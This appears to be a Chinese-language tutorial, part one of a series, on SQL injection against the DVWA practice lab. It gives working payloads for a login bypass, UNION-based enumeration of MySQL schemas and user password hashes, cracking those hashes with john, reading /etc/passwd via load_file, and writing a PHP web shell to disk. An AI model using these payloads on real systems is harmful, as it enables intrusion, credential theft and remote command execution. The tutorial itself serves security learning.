SQL注入(一)
sql注入的原理
- 应用程序将用户输入的参数作为查询条件,用户使用拼接的sql语句,并且将查询结果返回客户端浏览器。
- 欺骗服务器执行恶意的SQL命令。
- 使用
'or 1 = 1 –-拼接用户名可以免登录没有sql注入的程序,拼接为SELECT * FROM users WHERE user='' or 1=1 --- sql语句的注释符为“-- ”,后面必须加一个空格
- 查询条件1=1一定是真,如果程序没有输入数据的过滤,将返回所有的用户数据。
order by 9按第九序列进行排序可以借此来判断该表有几个字段
union联合查询
-
基本信息查询
-
' union select 1,2--联合查询拼接sql语句后为SELECT * FROM users WHERE user='' union select 1,2--- 结果为
- 结果为
-
上图1,2可以使用如下的参数代替获取数据库信息
-
数据库名字:database() DB用户:user() DB版本:version() 全局函数: DB所在的文件目录:@@datadir DB的主机名:@@hostname 主机的系统信息:@@version_compile_os 使用拼接代替:CONCAT_WS(CHAR(32,58,32),user(),database(),version()): 结果为:root@localhost : dvwa : 5.0.51a-3ubuntu5 char()ASCII转字符CHAR(32,58,32)=“ :”
-
-
查询所有库里的所有表的数量和其对应的数据库名字
' union select count(*), table_schema from information_schema.tables group by table_schema--union select 1,group_concat(schema_name),3,4 from information_schema.schemata查询所有数据库
- information_schema是MySQL 自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等。
-
查询确定库名里面的所有表
' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+
-
查询用户表的字段
' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--
-
查询user表里面的user字段和password字段的内容
' union select user,password from users--+
- 密码是有md5加密的需要解密:
username:passhash ——> dvwa.txt john --format=raw-MD5 dvwa.txt
-
文件读取
' union SELECT null, load_file('/etc/passwd')--或者使用十六进制代替尝试绕过过滤' union SELECT null, load_file(0x2f6574632f706173737764)--- load_file函数只有满足两个条件就可以使用:
- 文件权限:chmod a+x pathtofile
- 文件大小: 必须小于max_allowed_packet
-
文件写入
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/tmp/aa.php"--
- /tmp文件所有的用户都可以具有文件读写权限,可以写入一个php来获取shell
- 使用文件包含漏洞来使用shell
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
